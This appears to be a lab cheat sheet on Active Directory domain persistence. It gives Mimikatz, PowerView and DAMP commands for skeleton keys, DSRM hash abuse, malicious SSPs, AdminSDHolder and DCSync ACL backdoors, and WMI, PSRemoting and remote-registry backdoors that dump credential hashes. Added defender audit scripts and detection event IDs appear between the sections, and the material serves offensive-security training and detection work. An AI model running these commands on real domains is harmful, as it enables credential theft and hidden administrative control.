Domain Persistence

Golden Ticket -> NTLM hash of the krbtgt account
Silver Ticket -> NTLM hash of the machine account

Skeleton Key

Use the below command to inject a skeleton key (password would be mimikatz) on a Domain Controller of choice. DA privileges required.

Invoke-Mimikatz -Command '"privilege::debug"  "misc::skeleton"' -ComputerName dcorpdc.dollarcorp.moneycorp.local

// it is possible to access any machine with a valid username and password as "mimikatz"

Enter-PSSession -Computername dcorp-dc -credential dcorp\Administrator

In case lsass is running as a protected process, we can still use Skeleton Key but it needs the mimikatz driver (mimidriv.sys) on disk of the target DC:

mimikatz # privilege::debug

mimikatz # !+

mimikatz # !processprotect /process:lsass.exe /remove

mimikatz # misc::skeleton

mimikatz # !-

DSRM is Directory Services Restore Mode

The DSRM administrator is a local administrator account on the DC

// Dump DSRM password (needs DA privs)
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc

// Compare the Administrator hash with the Administrator hash from the below command
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc

//First one is the DSRM local Administrator.

Enter-PSSession -Computername dcorp-dc
// Allow the DSRM account to log on over the network while the DC is running (value 2)
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

// Pass the DSRM Administrator hash; /domain is the DC name because it is a local account
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd  /run:powershell.exe"'
ls \\dcorp-dc\C$

Custom SSP

Drop the mimilib.dll to system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages:

$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages

• Using mimikatz, inject into lsass (not stable with Server 2016):

Invoke-Mimikatz -Command '"misc::memssp"'


All local logons on the DC are logged to C:\Windows\system32\kiwissp.log
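The three techniques above (Skeleton Key, DSRM logon behaviour, custom SSP) each leave a registry or on-disk trace. The following audit script is an added example, not part of the original notes; the function name Test-DcPersistenceIndicators is mine and the $KnownPackages baseline is an assumption that must be tuned to the OS build. Run it elevated on the DC, or wrap it in Invoke-Command.

```powershell
# Added defender-side audit (not from the original notes). Checks one DC for the
# Skeleton Key, DSRM and custom-SSP indicators described above.
function Test-DcPersistenceIndicators {
    [CmdletBinding()]
    param(
        # Assumed baseline of legitimate SSP/AP names; tune to the OS build in use.
        [string[]]$KnownPackages = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap')
    )

    $findings = New-Object System.Collections.Generic.List[string]
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

    # 1. RunAsPPL=1 makes lsass a protected process, so misc::skeleton and misc::memssp
    #    need a kernel driver (mimidrv.sys on disk) instead of a plain injection.
    $ppl = (Get-ItemProperty -Path $lsa -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL
    if ($ppl -ne 1) { $findings.Add('RunAsPPL is not 1: lsass is not running as a protected process') }

    # 2. DsrmAdminLogonBehavior 1 or 2 lets the DSRM account log on while AD DS is running;
    #    2 is the value the notes above set so the DSRM hash works over the network.
    $dsrm = (Get-ItemProperty -Path $lsa -Name DsrmAdminLogonBehavior -ErrorAction SilentlyContinue).DsrmAdminLogonBehavior
    if ($null -ne $dsrm -and $dsrm -ne 0) { $findings.Add("DsrmAdminLogonBehavior is $dsrm (expected absent or 0)") }

    # 3. Security Packages (REG_MULTI_SZ) under Lsa and Lsa\OSConfig: anything outside the
    #    baseline (e.g. mimilib) is loaded into lsass at boot and sees every logon.
    foreach ($key in @($lsa, "$lsa\OSConfig")) {
        $pkgs = (Get-ItemProperty -Path $key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
        foreach ($p in @($pkgs)) {
            $name = ([string]$p).Trim('"', ' ')   # an unused value is commonly stored as ""
            if ($name -and ($KnownPackages -notcontains $name.ToLower())) {
                $findings.Add("Unknown security package '$name' in $key")
            }
        }
    }

    # 4. On-disk artefacts named in the notes above.
    foreach ($f in @("$env:SystemRoot\System32\mimilib.dll", "$env:SystemRoot\System32\kiwissp.log")) {
        if (Test-Path -LiteralPath $f) { $findings.Add("Artefact present: $f") }
    }

    # 5. DLLs loaded into lsass that are not validly signed. Module enumeration is denied
    #    when lsass is PPL, which is the desired state, so that case is only reported.
    try {
        $lsass = Get-Process -Name lsass -ErrorAction Stop
        foreach ($m in $lsass.Modules) {
            $sig = Get-AuthenticodeSignature -FilePath $m.FileName
            if ($sig.Status -ne 'Valid') {
                $findings.Add("lsass module without a valid signature: $($m.FileName) ($($sig.Status))")
            }
        }
    } catch {
        $findings.Add("Could not enumerate lsass modules: $($_.Exception.Message)")
    }

    if ($findings.Count -eq 0) { 'No persistence indicators found' } else { $findings }
}

Test-DcPersistenceIndicators
```

A registry write to Security Packages or DsrmAdminLogonBehavior also produces Event ID 4657 on the DC when "Audit Registry" is enabled for the Lsa key, which is the cheaper way to catch these changes in near real time.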

AdminSDHolder

Add FullControl permissions for a user to the AdminSDHolder using PowerView as DA:

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights All -Verbose

Using ActiveDirectory Module and Set-ADACL:

Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -Verbose


Other interesting permissions (ResetPassword, WriteMembers) for a user to the AdminSDHolder:

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights ResetPassword -Verbose
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights WriteMembers -Verbose



Run SDProp manually using Invoke-SDPropagator.ps1 from Tools directory:

Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose


• For pre-Server 2008 machines:

Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose



Check the Domain Admins permission - PowerView as normal user:

Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'student1'}

• Using ActiveDirectory Module:

(Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ?{$_.IdentityReference -match 'student1'}
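The checks above look for one known principal. A defender wants the opposite view: every trustee on AdminSDHolder that is not a built-in or default domain object, since SDProp will copy each such ACE onto every protected group and account. The script below is an added example, not part of the original notes; it uses the same ActiveDirectory module and AD: drive as the notes, the function name Get-AdminSDHolderAudit is mine, and the "RID >= 1000 means a custom principal" rule is a heuristic I am assuming, not a documented default.

```powershell
# Added defender-side check (not from the original notes): non-default ACEs on
# AdminSDHolder plus the SDProp interval. Requires the ActiveDirectory module.
function Get-AdminSDHolderAudit {
    [CmdletBinding()]
    param()
    Import-Module ActiveDirectory -ErrorAction Stop

    $domain = Get-ADDomain
    $path = "AD:\CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"
    $acl = Get-Acl -Path $path

    # Resolve trustees to SIDs so the check does not depend on name resolution.
    $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])

    $suspect = foreach ($ace in $rules) {
        $sid = $ace.IdentityReference.Value
        # Heuristic (assumption): well-known SIDs (S-1-5-9, S-1-5-32-544, ...) and default
        # domain objects with RID < 1000 (Domain Admins 512, Enterprise Admins 519, ...)
        # are expected; any S-1-5-21-...-<RID>=1000 trustee was created after domain setup.
        $isCustom = ($sid -match '^S-1-5-21-\d+-\d+-\d+-(\d+)$') -and ([int]$matches[1] -ge 1000)
        if (-not $isCustom) { continue }

        $name = $sid
        try { $name = $ace.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value } catch {}
        [pscustomobject]@{
            Trustee    = $name
            Type       = $ace.AccessControlType
            Rights     = $ace.ActiveDirectoryRights
            # A non-empty ObjectType narrows the ACE to one property or extended right
            # (for example the Reset Password right or the member attribute).
            ObjectType = $ace.ObjectType
            Inherited  = $ace.IsInherited
        }
    }

    # SDProp runs every 60 minutes by default; AdminSDProtectFrequency (seconds) overrides
    # that. The value only exists on a DC and is absent when the default applies.
    $freq = (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters' `
        -Name AdminSDProtectFrequency -ErrorAction SilentlyContinue).AdminSDProtectFrequency
    $interval = if ($freq) { [int]$freq } else { 3600 }

    [pscustomobject]@{
        Object                = $path
        NonDefaultAces        = @($suspect)
        SDPropIntervalSeconds = $interval
    }
}

$audit = Get-AdminSDHolderAudit
$audit.NonDefaultAces | Format-Table Trustee, Type, Rights, ObjectType, Inherited -AutoSize
"SDProp interval: $($audit.SDPropIntervalSeconds) s"
```

Any row in NonDefaultAces is worth a ticket: legitimate products rarely need rights on AdminSDHolder itself. The ACL write that creates such a row is logged as Event ID 5136 on the DC when "Audit Directory Service Changes" is enabled, so the same condition can be alerted on rather than polled.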


Abusing ResetPassword using PowerView_dev:

Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose


• Using ActiveDirectory Module:

Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

Force change password

PS> Import-Module .\PowerView_dev.ps1
PS> $SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
PS> $Cred = New-Object System.Management.Automation.PSCredential('dcorp\user', $SecPassword)
PS> $UserPassword = ConvertTo-SecureString 'Password1!' -AsPlainText -Force
PS> Set-DomainUserPassword -Identity prodadmin -AccountPassword $UserPassword -Credential $Cred

ACLs – Rights Abuse

Add FullControl rights:

Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName student1 -Rights All -Verbose


• Using ActiveDirectory Module and Set-ADACL:

Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -Verbose



Add rights for DCSync:

Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName student1 -Rights DCSync -Verbose


• Using ActiveDirectory Module and Set-ADACL:

Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -GUIDRight DCSync -Verbose


Execute DCSync:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
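Both "Rights All" and "Rights DCSync" on the domain head are ACEs a defender can enumerate directly. The script below is an added example, not part of the original notes: it lists every trustee on the domain object holding GenericAll, WriteDacl, WriteOwner or one of the three DS-Replication extended rights (the standard schema GUIDs for those rights are used, which is what the DCSync right resolves to). The function name Get-DomainHeadRightHolders is mine and the "RID >= 1000 means a non-default principal" flag is a heuristic assumption; domain controllers, Administrators and similar built-ins show as default and must still be reviewed by eye.

```powershell
# Added defender-side check (not from the original notes): who can DCSync or
# rewrite the ACL of the domain head. Requires the ActiveDirectory module.
function Get-DomainHeadRightHolders {
    [CmdletBinding()]
    param()
    Import-Module ActiveDirectory -ErrorAction Stop

    # Schema GUIDs of the replication control access rights (standard values).
    $replRights = @{
        '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
        '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
        '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
    }
    $adr = [System.DirectoryServices.ActiveDirectoryRights]
    $domainDn = (Get-ADDomain).DistinguishedName
    $rules = (Get-Acl -Path "AD:\$domainDn").GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])

    foreach ($ace in $rules) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $r = $ace.ActiveDirectoryRights
        $why = @()
        if ($r.HasFlag($adr::GenericAll))  { $why += 'GenericAll' }
        if ($r.HasFlag($adr::WriteDacl))   { $why += 'WriteDacl' }
        if ($r.HasFlag($adr::WriteOwner))  { $why += 'WriteOwner' }
        if ($r.HasFlag($adr::ExtendedRight)) {
            $g = $ace.ObjectType.ToString()
            # An empty ObjectType means "all extended rights", which includes replication.
            if ($g -eq [guid]::Empty.ToString()) { $why += 'AllExtendedRights' }
            elseif ($replRights.ContainsKey($g))  { $why += $replRights[$g] }
        }
        if ($why.Count -eq 0) { continue }

        $sid = $ace.IdentityReference.Value
        # Heuristic (assumption): domain SIDs with RID >= 1000 were created after setup.
        $nonDefault = ($sid -match '^S-1-5-21-\d+-\d+-\d+-(\d+)$') -and ([int]$matches[1] -ge 1000)
        $name = $sid
        try { $name = $ace.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value } catch {}

        [pscustomobject]@{
            Trustee    = $name
            Rights     = ($why -join ', ')
            NonDefault = $nonDefault
            Inherited  = $ace.IsInherited
        }
    }
}

# Start with the non-default rows; then confirm every default row is really a DC or admin group.
Get-DomainHeadRightHolders | Sort-Object NonDefault -Descending | Format-Table -AutoSize
```

On the detection side, a DCSync run against a DC is visible as Event ID 4662 on that DC with one of the GUIDs above in the Properties field; filtering those events to source accounts that are not domain controller computer accounts (and, for the replication GUIDs, not known sync services) catches the execution even when the ACL change itself was missed.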


Security Descriptors - WMI

set-remotewmi.ps1

ACLs can be modified to allow non-admin users access to securable objects.
// Use RACE.ps1

• On local machine for student1:

Set-RemoteWMI -UserName student1 -Verbose


• From admin's Session:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose


• On remote machine with explicit credentials. Only root\cimv2 and nested namespaces:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose


• On remote machine remove permissions:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose

Security Descriptors - PowerShell Remoting

set-remotepsremoting.ps1

On local machine for student1:

Set-RemotePSRemoting -UserName student1 -Verbose


• On remote machine for student1 without credentials:

Set-RemotePSRemoting -UserName student1 -ComputerName dcorp-dc -Verbose


• On remote machine, remove the permissions:

Set-RemotePSRemoting -UserName student1 -ComputerName dcorp-dc -Remove



// Verify remote WMI access to the DC as student1:
gwmi -class win32_operatingsystem -ComputerName dcorpdc.dollarcorp.moneycorp.local

Security Descriptors - Remote Registry

Using DAMP, with admin privs on remote machine:

Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose


• As student1, retrieve machine account hash:
# replace the variable $iv with $initv
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose


• Retrieve local account hash:

Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose


• Retrieve domain cached credentials:

Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose
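The three security-descriptor sections above (WMI namespaces, PowerShell Remoting endpoints, remote registry) all work by adding an allow ACE for a low-privileged principal to a descriptor that normally lists only administrators. The audit below is an added example, not part of the original notes or of RACE/DAMP: it reads those same three descriptors on the local host and reports allow ACEs held by non-default principals. The function names are mine, the namespace list is an assumption, and the "RID >= 1000" rule is a heuristic. Run it elevated on the host being checked; the page does not list which hive keys the registry backdoor modifies, so $RegistryKeys only carries the winreg key and should be extended with the keys your tooling touches.

```powershell
# Added defender-side audit (not from the original notes): non-default allow ACEs
# on WMI namespaces, PSRemoting session configurations and remote-registry keys.
function Get-RemoteAccessDescriptorAudit {
    [CmdletBinding()]
    param(
        [string[]]$WmiNamespaces = @('root', 'root\cimv2'),
        [string[]]$RegistryKeys  = @('HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg')
    )

    function Test-CustomSid([string]$Sid) {
        # Heuristic (assumption): domain or local SIDs with RID >= 1000 were created after setup;
        # well-known SIDs, BUILTIN groups and default RIDs < 1000 are treated as expected.
        return ($Sid -match '^S-1-5-21-\d+-\d+-\d+-(\d+)$') -and ([int]$matches[1] -ge 1000)
    }
    function Resolve-Sid([string]$Sid) {
        try { return ([System.Security.Principal.SecurityIdentifier]$Sid).Translate([System.Security.Principal.NTAccount]).Value }
        catch { return $Sid }
    }

    # 1. PowerShell Remoting: each session configuration carries its own SDDL string.
    foreach ($cfg in Get-PSSessionConfiguration) {
        if (-not $cfg.SecurityDescriptorSddl) { continue }
        $sd = New-Object System.Security.AccessControl.CommonSecurityDescriptor($false, $false, $cfg.SecurityDescriptorSddl)
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace.AceType -eq 'AccessAllowed' -and (Test-CustomSid $ace.SecurityIdentifier.Value)) {
                [pscustomobject]@{ Surface = "PSRemoting:$($cfg.Name)"; Trustee = (Resolve-Sid $ace.SecurityIdentifier.Value); Access = ('0x{0:X}' -f $ace.AccessMask) }
            }
        }
    }

    # 2. WMI namespaces: __SystemSecurity returns a Win32_SecurityDescriptor whose DACL
    #    entries carry a Win32_Trustee with the SID as a string. AceType 0 = access allowed.
    foreach ($ns in $WmiNamespaces) {
        $out = Invoke-WmiMethod -Namespace $ns -Path '__SystemSecurity=@' -Name GetSecurityDescriptor
        if ($out.ReturnValue -ne 0) { continue }
        foreach ($ace in $out.Descriptor.DACL) {
            if ($ace.AceType -eq 0 -and (Test-CustomSid $ace.Trustee.SIDString)) {
                [pscustomobject]@{ Surface = "WMI:$ns"; Trustee = (Resolve-Sid $ace.Trustee.SIDString); Access = ('0x{0:X}' -f $ace.AccessMask) }
            }
        }
    }

    # 3. Remote registry: the winreg key ACL decides who may open the registry remotely at all;
    #    add the hive keys your environment cares about to $RegistryKeys.
    foreach ($key in $RegistryKeys) {
        $acl = Get-Acl -Path $key -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
            if ($ace.AccessControlType -eq 'Allow' -and (Test-CustomSid $ace.IdentityReference.Value)) {
                [pscustomobject]@{ Surface = "Registry:$key"; Trustee = (Resolve-Sid $ace.IdentityReference.Value); Access = $ace.RegistryRights.ToString() }
            }
        }
    }
}

Get-RemoteAccessDescriptorAudit | Format-Table -AutoSize
```

An empty result is the expected state on a DC. Each surface also has an audit trail: registry ACL changes raise Event ID 4670 when object access auditing is enabled on the key, and the WMI and WinRM descriptor changes made by the scripts above run as administrator on the target, so pairing this poll with 4670 and with alerts on remote administrative sessions covers both the change and its use.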

